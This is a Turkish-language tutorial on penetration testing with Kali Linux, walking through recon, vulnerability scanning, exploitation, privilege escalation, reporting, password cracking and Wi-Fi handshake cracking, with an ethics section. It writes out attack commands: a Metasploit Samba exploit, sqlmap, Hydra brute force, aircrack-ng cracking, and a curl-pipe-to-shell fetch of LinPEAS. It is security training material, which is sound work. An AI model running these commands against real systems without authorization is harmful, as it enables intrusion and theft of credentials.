Penetrasyon Testi Rehberi: Kali Linux ile Güvenlik Denetimi
Penetrasyon Testi Nedir?
Penetrasyon testi (kısaca pentest), bir bilgi sisteminin güvenlik açıklarını tespit etmek amacıyla gerçekleştirilen kontrollü ve yetkilendirilmiş bir saldırı simülasyonudur. Amaç, kötü niyetli bir saldırganın sisteme sızmadan önce zayıf noktaları keşfetmek ve bu açıkları kapatmaktır. Penetrasyon testi, günümüzde kurumsal güvenlik stratejilerinin vazgeçilmez bir parçası haline gelmiştir.
Pentest sürecinde kullanılan en popüler işletim sistemi Kali Linux'tur. Offensive Security tarafından geliştirilen bu Debian tabanlı dağıtım, içerisinde 600'den fazla güvenlik aracı barındırır ve güvenlik profesyonellerinin en temel çalışma ortamıdır.
Kali Linux Kurulumu ve Hazırlık
Kali Linux'u kullanmaya başlamadan önce ortamınızı doğru şekilde hazırlamanız gerekir. Test ortamı olarak sanal makine kullanmanız şiddetle tavsiye edilir. VirtualBox veya VMware üzerinde Kali Linux kurarak güvenli bir test ortamı oluşturabilirsiniz.
Sistem Güncelleme
Kali Linux kurulumundan sonra yapmanız gereken ilk iş sistemi güncellemektir:
sudo apt update
sudo apt upgrade -y
sudo apt dist-upgrade -y
Test Ortamının Hazırlanması
Penetrasyon testi pratiği yapmak için yasal ve etik bir ortama ihtiyacınız vardır. Aşağıdaki platformlar bu amaçla kullanılabilir:
- Metasploitable 2/3 – Kasıtlı olarak savunmasız bırakılmış sanal makine
- DVWA (Damn Vulnerable Web Application) – Web uygulama güvenliği pratiği için
- HackTheBox – Çevrimiçi CTF ve pentest laboratuvarı
- TryHackMe – Rehberli güvenlik eğitim platformu
- VulnHub – İndirilebilir savunmasız sanal makineler
Penetrasyon Testi Aşamaları
Profesyonel bir penetrasyon testi beş temel aşamadan oluşur. Her aşama bir sonrakine temel teşkil eder ve sistematik bir yaklaşım gerektirir.
1. Keşif (Reconnaissance)
Keşif aşaması, hedef hakkında mümkün olduğunca fazla bilgi toplamayı amaçlar. İki türe ayrılır:
Pasif Keşif: Hedef sistemle doğrudan etkileşime girmeden bilgi toplama sürecidir. OSINT (Açık Kaynak İstihbaratı) teknikleri bu aşamada kullanılır.
# whois sorgusu ile domain bilgisi toplama
whois hedefdomain.com
# DNS kayıtlarını sorgulama
dig hedefdomain.com ANY
# Alt alan adlarını keşfetme (theHarvester)
theHarvester -d hedefdomain.com -b google,bing,linkedin
# Shodan CLI ile internete açık servisler
shodan search hostname:hedefdomain.com
Aktif Keşif: Hedef sistemle doğrudan iletişim kurarak bilgi toplama aşamasıdır. Bu aşamadan itibaren yazılı yetkilendirme şarttır.
# Nmap ile temel port taraması
nmap -sV -sC -oN tarama_sonucu.txt 192.168.1.100
# Agresif tarama (daha fazla bilgi, daha fazla gürültü)
nmap -A -T4 -p- 192.168.1.100
# UDP port taraması
nmap -sU --top-ports 100 192.168.1.100
# Belirli bir ağ aralığını tarama
nmap -sn 192.168.1.0/24
Nmap çıktısında dikkat etmeniz gereken unsurlar: açık portlar, çalışan servisler, servis versiyonları ve işletim sistemi bilgisidir.
2. Tarama ve Zafiyet Analizi
Keşif aşamasında elde edilen bilgiler doğrultusunda hedef sistemdeki zafiyetler tespit edilir.
# Nmap NSE scriptleri ile zafiyet taraması
nmap --script vuln 192.168.1.100
# Belirli bir servise yönelik script taraması
nmap --script smb-vuln* -p 445 192.168.1.100
# Nikto ile web sunucusu zafiyet taraması
nikto -h http://192.168.1.100
# WPScan ile WordPress zafiyet taraması
wpscan --url http://192.168.1.100/wordpress --enumerate vp,vt,u
Daha kapsamlı zafiyet taramaları için OpenVAS veya Nessus gibi araçlar kullanılabilir:
# OpenVAS kurulumu ve başlatma
sudo apt install openvas -y
sudo gvm-setup
sudo gvm-start
3. Sömürü (Exploitation)
Tespit edilen zafiyetlerin istismar edilerek sisteme erişim sağlandığı aşamadır. Bu aşamada Metasploit Framework en çok kullanılan araçtır.
# Metasploit'i başlatma
msfconsole
# Bir exploit arama
msf6 > search type:exploit platform:linux smb
# Exploit seçme ve yapılandırma
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.1.100
msf6 exploit(multi/samba/usermap_script) > set LHOST 192.168.1.50
msf6 exploit(multi/samba/usermap_script) > show options
msf6 exploit(multi/samba/usermap_script) > exploit
Web uygulamalarına yönelik testlerde ise farklı araçlar devreye girer:
# SQLMap ile SQL injection testi
sqlmap -u "http://hedef.com/sayfa.php?id=1" --dbs --batch
# Burp Suite ile araya girme (intercept) proxy ayarı
# Tarayıcı proxy: 127.0.0.1:8080
# Gobuster ile dizin keşfi
gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt
# ffuf ile fuzzing
ffuf -u http://192.168.1.100/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
4. Yetki Yükseltme (Privilege Escalation)
Sisteme düşük yetkili bir kullanıcı olarak eriştikten sonra, root veya administrator yetkisi elde etmeye çalışılan aşamadır.
Linux sistemlerde yetki yükseltme kontrolleri:
# Mevcut kullanıcı ve yetki bilgisi
whoami
id
sudo -l
# SUID bit ayarlanmış dosyaları bulma
find / -perm -4000 -type f 2>/dev/null
# Yazılabilir dosya ve dizinleri kontrol etme
find / -writable -type d 2>/dev/null
# Cron job'ları inceleme
cat /etc/crontab
ls -la /etc/cron.*
# Çekirdek versiyonunu kontrol etme
uname -a
cat /etc/os-release
# LinPEAS ile otomatik kontrol
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Windows sistemlerde yetki yükseltme:
# Sistem bilgisi toplama
systeminfo
whoami /priv
# WinPEAS ile otomatik tarama
winpeas.exe
# PowerUp ile yetki yükseltme vektörleri
powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"
5. Raporlama
Penetrasyon testinin en kritik aşamalarından biri raporlamadır. Teknik ve yönetici özeti olmak üzere iki farklı perspektiften hazırlanmalıdır. Raporun içermesi gereken bölümler:
- Yönetici Özeti: Teknik olmayan paydaşlara yönelik, risklerin iş etkisini anlatan bölüm
- Kapsam ve Metodoloji: Test edilen sistemler, kullanılan yöntemler ve sınırlamalar
- Bulgular: Her bir zafiyet için CVSS puanı, etki analizi, kanıt ekran görüntüleri ve tekrar üretme adımları
- Çözüm Önerileri: Her bulgu için somut ve uygulanabilir düzeltme tavsiyeleri
- Ekler: Tarama çıktıları, ham veriler ve kullanılan araçların listesi
Ağ Güvenliği Testlerinde Sık Kullanılan Araçlar
Kali Linux'un zengin araç setinden en sık kullanılanlar şunlardır:
- Nmap – Port tarama ve ağ keşfi
- Metasploit Framework – Exploit geliştirme ve çalıştırma platformu
- Burp Suite – Web uygulama güvenlik testi
- Wireshark – Ağ trafiği analizi ve paket yakalama
- John the Ripper / Hashcat – Parola kırma araçları
- Aircrack-ng – Kablosuz ağ güvenlik testi
- Hydra – Çevrimiçi brute-force aracı
- Responder – LLMNR/NBT-NS zehirleme aracı
- BloodHound – Active Directory analiz aracı
- Impacket – Ağ protokolü manipülasyon kütüphanesi
Parola Saldırıları
Zayıf parolalar, en yaygın güvenlik açıklarından biridir. Parola güvenliğini test etmek için:
# Hydra ile SSH brute-force testi
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
# John the Ripper ile hash kırma
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# Hashcat ile GPU destekli hash kırma (NTLM örneği)
hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Kablosuz Ağ Güvenlik Testi
Kablosuz ağ testleri, kurumsal güvenlik denetimlerinin önemli bir bileşenidir. Bu testleri yalnızca yetkilendirilmiş ağlarda gerçekleştirin:
# Kablosuz arayüzü monitor moda alma
sudo airmon-ng start wlan0
# Çevredeki ağları tarama
sudo airodump-ng wlan0mon
# Belirli bir ağı hedefleme ve handshake yakalama
sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w yakalama wlan0mon
# Yakalanan handshake ile parola testi
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt yakalama-01.cap
Yasal ve Etik Sorumluluklar
Penetrasyon testi gerçekleştirirken dikkat edilmesi gereken kritik hususlar vardır:
- Yazılı yetkilendirme şarttır: Test öncesinde mutlaka sistem sahibinden yazılı izin alın. "Kapsam Belgesi" (Rules of Engagement) ve "Yetkilendirme Mektubu" olmadan asla teste başlamayın.
- Kapsam dışına çıkmayın: Yetkilendirme belgesinde tanımlanan sistemler ve yöntemler dışında test yapmayın.
- TCK 243-245. maddeler: Türkiye'de yetkisiz erişim, veri manipülasyonu ve sistem engelleme suçları ciddi yaptırımlara tabidir.
- Verileri koruyun: Test sırasında eriştiğiniz hassas verileri gizli tutun ve test sonrasında güvenli şekilde imha edin.
- Hizmet kesintisi riskini minimize edin: Üretim ortamlarında agresif tarama ve exploit denemelerinden kaçının. Mümkünse test ortamında çalışın.
Profesyonel Gelişim ve Sertifikalar
Penetrasyon testi alanında kariyer yapmak isteyenler için önerilen sertifikalar:
- OSCP (Offensive Security Certified Professional) – Sektörün en saygın pratik sertifikası
- CEH (Certified Ethical Hacker) – Giriş seviyesi etik hacker sertifikası
- eJPT (eLearnSecurity Junior Penetration Tester) – Başlangıç seviyesi, uygun fiyatlı
- OSWE (Offensive Security Web Expert) – Web uygulama güvenliği uzmanlığı
- CRTP (Certified Red Team Professional) – Active Directory ve red team operasyonları
Sonuç
Penetrasyon testi, siber güvenliğin en dinamik ve heyecan verici alanlarından biridir. Kali Linux, bu alanda çalışan profesyonellere güçlü ve kapsamlı bir araç seti sunar. Ancak unutulmamalıdır ki araçlar sadece birer vasıtadır; asıl önemli olan ağ protokollerini, işletim sistemi mimarisini ve uygulama güvenliği prensiplerini derinlemesine anlamaktır. Sürekli öğrenme, laboratuvar ortamlarında pratik yapma ve etik ilkelere bağlı kalma, başarılı bir güvenlik profesyonelinin olmazsa olmazlarıdır.